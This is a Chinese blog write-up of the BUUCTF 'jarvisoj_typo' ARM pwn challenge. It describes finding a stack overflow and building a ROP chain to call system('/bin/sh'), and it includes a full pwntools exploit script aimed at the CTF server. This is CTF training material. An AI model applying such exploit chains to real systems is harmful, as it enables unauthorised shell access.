jarvisoj_typo

已于 2022-03-17 22:05:57 修改
阅读量414 收藏
点赞数 2
分类专栏: buuctf 题目 文章标签: arm开发 linux 运维 pwn
于 2022-03-17 22:01:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/123561667
版权

jarvisoj_typo

查看保护
在这里插入图片描述
arm程序,这一类的环境的话可以去网上找找怎么安装,qemu,gdb-multiarch,等 等
在这里插入图片描述
32位,静态链接,去了符号表信息
攻击思路:因为去了符号表信息,进了ida之后基本看不出程序功能
在这里插入图片描述
这里笔者直接手动fuzz了一下发现有栈溢出漏洞
在这里插入图片描述
保护没有开canary和pie,所以考虑rop了。
劫持程序控制流执行system("/bin/sh");找一下/bin/sh
在这里插入图片描述
在这里插入图片描述
看了一下引用,跟进10bab
在这里插入图片描述
这个函数和do_system()很相似,暂且先认为它是system吧,因为错了还可以继续找(XD
有了/bin/sh有了system接下来就是rop,确定一下偏移直接动调这里动调的方法和x64下的基本一样
这里笔者用的是gdb-multiarchqemu-arm -g 1234 z1r0形成的动态调试,测出偏移为112
接着就是找gadget,arm里面的一参数是r0
ROPgadget --binary z1r0 --only 'pop|ret' | grep r0
payload和x64rop一样的,运行即可getshell(笔者这里的exp没有什么qemu-arm,笔者也不知道为什么 ,安装完环境之后笔者这里可以直接运行arm的程序了。。。

from pwn import *

context(arch='arm', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 27675)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

pop_r0_r4_pc = 0x00020904

bin_sh = 0x0006c384
system_addr = 0x10BA8

p1 = b'a' * 112 + p32(pop_r0_r4_pc) + p32(bin_sh) * 2 + p32(system_addr)
#p1 = b'a' * 112 + p32(system_addr)
print(cyclic(0x100))
r.send('\n')
r.sendline(p1)

r.interactive()
z1r0.
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Jarvisoj 逆向总结
Assassin
10-13 3824
因为本人是菜鸟,所以由简单但难的做了 [61dctf]androideasy 没什么可说的,直接反汇编打求一下密码 #_*_coding:utf-8_*_ a=[113, 123, 118, 112, 108, 94, 99, 72, 38, 68, 72, 87, 89, 72, 36, 118, 100, 78, 72, 87, 121, 83, 101, 39, 62, 94,...
(Jarvis Oj)(Pwn) Smashes
Nothing
06-14 2393
(Jarvis Oj)(Pwn) Smashes 查看保护。打开了栈保护。看上去有点麻烦。 再来分析下程序代码。如下是主要的函数体部分。 这个函数首先让我们输入name字符串,通过gets()函数,是有溢出的,但是在输入过长的字符串时程序会abort。 并且提示 ./smashes terminated 这里其实是ssp(Stack Smashing Protector)的提示...
jarvis OJ
CHOOOU的博客
11-05 817
basic Baby’s Crack 程序大概就是打开一个命令行输入的 file,然后打开一个 tmp,对 file 加密写入 tmp,将 file 删除,将 tmp 重命名为 file。 直接在 ida 中 F5,关键的代码就是: while (feof(*(_QWORD *)&argc, argv, v8, v16) == 0)
buuctf ---- jarvisoj_level(全)
L0g1c的博客
01-22 3543
buuctf ----- jarvisoj_level0 运行一下程序 使用64位的IDA查看程序 查看vulner_function函数 发现buf存在溢出漏洞,buf是0x80,read了0x200 存在栈溢出漏洞 发现后门函数system("/bin/sh"),解题思路:修改read函数的ret address 为后门函数的地址。 编写exp from pwn import* io=remote("node4.buuoj.cn",26034) sys_addr=0x0400596 pa
jarvisoj_web_witerup
残阳泼茶香的博客
03-17 506
PORT51 该题提示我们需要使用51端口进入该站点 然而此站为http://web.jarvisoj.com:32770/ 它的端口已经是确定了的,所以只能更改我们的port了。 本来用的是kali虚拟机,不能通过外网,命令如下 curl --local-port 51 http://web.jarvisoj.com:32770/ 自己试试,我就懒得弄win上的curl命令了 L...
kio_typo3-开源
05-13
标题中的“kio_typo3”是一个开源项目,专门针对TYPO3内容管理系统设计。TYPO3是一款流行的开源CMS,用于构建复杂的企业级网站和内容管理解决方案。这个项目的主要目的是使TYPO3的模板和文件结构能够通过KDE桌面环境...
[CMS程序]Typo3 4.2.5_typo3_src-4.2.5.zip
最新发布
03-17
Typo3 CMS系统概述】 Typo3是一款开源的内容管理系统(CMS),以其强大的功能和高度的可扩展性闻名。在4.2.5版本中,Typo3提供了丰富的功能,适用于构建复杂的网站和企业级应用。这个版本是该系统发展历史上的一...
sphinx_typo3_theme:docs.typo3.org的Sphinx主题
05-12
docs.typo3.org的Sphinx TYPO3主题 Sphinx TYPO3主题包含构建提供该主题的Sphinx扩展所需的所有文件。 维护者:Martin Bless < > 由TYPO3文档团队提供。 免费软件:MIT许可证 作者:请参阅AUTHORS.rst 仓库...
jarvis一个非常智能基于Webpack仪表板的浏览器
08-10
**Jarvis:Webpack智能仪表板浏览器** 在现代前端开发中,Webpack 已经成为不可或缺的模块打包工具。它能够高效地处理项目中的各种资源,如JavaScript、CSS、图片等,并将其打包成适合生产环境的静态文件。而 `...
CTF pwn -- ARM架构的pwn题详解
lifanxin的博客
05-14 2814
arm架构的pwn题详解概述环境搭建使用QEMU使用gdb-multiarchARM架构基本知识一道例题参考博客总结 概述   ARM架构过去称作进阶精简指令集机器(Advanced RISC Machine,更早称作:Acorn RISC Machine),是一个32位精简指令集(RISC)处理器架构,其广泛地使用在许多嵌入式系统设计。由于节能的特点,ARM处理器非常适用于移动通讯领域,符合其主要设计目标为低耗电的特性。因此我们常用的手机、平板等移动设备都是采用ARM体系架构的,因此CTF中不可避免也会出
PWN题搭建
weixin_30855761的博客
06-07 553
0x00.准备题目 例如:level.c #include <stdio.h> #include <unistd.h> int main(){ char buffer[0x10] = {0}; setvbuf(stdout, NULL, _IOLBF, 0); printf("Do your kown what is it : ...
Jarvisoj刷题笔记(CTF Basic题)
Arthur_WangYu的博客
10-01 613
某天A君的网站被日,管理员密码被改,死活登不上,去数据库一看,啥,这密码md5不是和原来一样吗?为啥登不上咧?d78b6f302l25cdc811adfe8d4e7c9fd34 请提交PCTF{原来的管理员密码}
jarvisoj_level0
weixin_56301399的博客
07-21 575
在Functionswindow可以看到有一个callsystem()函数,按F5反汇编可以看到这是一个系统调用,且callsystem()函数的起始地址为0x400596。双击vulnerable_function()函数可以看到buf的长度只有0x80,即可用栈大小只有108字节,但是read()并没有限制输入,显然存在栈溢出漏洞。buf需覆盖0x80个字节覆盖,再加上rbp的0x8个字节,最后加上callsystem()函数的起始地址0x400596构成payload。信息就了解他是64位即可。...
jarvis oj_用一种态度来构建Jarvis,生成式聊天机器人
weixin_26632369的博客
07-20 1165
jarvis ojCarsales.com, the company I work for, is holding a hackathon event. This is an annual event where everyone (tech or non tech) comes together to form a team and build anything — anything at al...
Jarvis OJ PHPINFO【审计代码反序列化】
Sp4rkW的博客
11-02 3937
原题地址:http://web.jarvisoj.com:32784/ 其实这题一开始是没有任何思路的,感觉不存在任何数据传输接收点,后来看到了一篇wp,点这里 感觉瞬间打开了新世界,,,这里写篇write up记录下做题过程 首先打开题目页面直接获得源码: &lt;?php //A webshell is wait for you ini_set('session.s...
Jarvis OJ - ALL CHALLENGS
qq_41996851的博客
04-12 423
作为一个安全菜鸟正在慢慢入门,在了解完基本的CTF知识后就开始刷题找知识点的感觉了 虽然并不想写这篇博客,因为大部分题的思路都是看人家的writeup,并且人家写的比我更详细,但一些题目有很多知识点需要记住,所以就有了这篇博客 WEB篇 LOCALHOST 看解决数量就知道没啥可说的; 对于ip可控的2个头部一个是x-forwarded-for,一个是client-ip x-forwarded-for: X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器.
Jarvis OJ web(一)
Lemon's blog
10-04 947
前言:总结一下最近做过的jarvisoj的web题,有的很有意思,能学习到很多新知识 LOCALHOST 提示很明显,伪造IP地址即可 抓包进行伪造,即可得出flag Login 一个提交页面,源码中也没有发现什么线索,抓包来看一下 有一句提示 "select * from `admin` where password='".md5($pass,true)."'" 这里就涉及到MD5函数...
jarvisoj——admin
D-R0s1的博客
10-08 770
  在接触jarvisoj平台的题目的时候,,第一个感觉就是考察的技能点比较多,比较全面,较其他平台相比题目比较难。但是当我们在努力弄懂一个题目考察的技能点及其解题思路的时候,收获也是很大的。再解决一些web题的过程中,除了要代码审计的时候要细心以外,在抓包分析的过程中也要十分的细心。虽然说比赛过程中,时间是很宝贵的,要提高做题速度,但是还是要步骤操作快,分析的时候要慢,,不然很可能漏掉一些细节线...
TYPO3 TypoScript语法深入研究
"Typoscript-Syntax-4.2.pdf 是TYPO3官方文档的一部分,主要讲解了TYPO3的TypoScript语法,适用于管理员和中级用户。文档由TYPO3核心开发团队编写,并在2008年11月修订至4.2版本。 TypoScript是一种配置语言,用于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值